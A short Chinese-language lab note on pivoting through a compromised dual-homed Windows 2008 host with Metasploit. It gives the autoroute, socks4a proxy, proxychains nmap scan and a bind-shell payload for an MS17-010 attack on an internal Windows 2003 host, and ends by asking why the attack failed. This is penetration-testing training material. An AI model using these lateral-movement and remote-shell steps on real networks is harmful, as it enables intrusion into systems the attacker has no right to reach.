攻击机:kali(192.168.10.8)
受害机(Win2008):(192.168.10.13、10.0.0.1)
受害机(Win2003):(10.0.0.2)
关系:
kali可以ping通Win2008
Win2003可以ping通Win2008
Kali不可以ping通Win2003
假设攻击机通过ms17-010漏洞打入了一台主机(Win2008)
发现受害机器是双网卡
于是做10.0.0.0/24的路由
run autoroute -s 10.0.0.0/24 (添加一条通向目标服务器内网的路由)
run autoroute -p (查看路由设置情况)
设置代理
use auxiliary/server/socks4a
修改代理文件
vi /etc/proxychains.conf
执行
探测10.0.0.2主机端口开放情况(默认知道10.0.0.2主机):
proxychains nmap -sT -Pn 10.0.0.2
利用ms17-010攻击10.0.0.2(win2003)主机
利用正向连接载荷:set payload generic/shell_bind_tcp(攻击机设置一个端口(LPORT),Payload在测试机执行打开该端口,以便攻击机可以接入。)
执行
为什么最后没有攻击成功?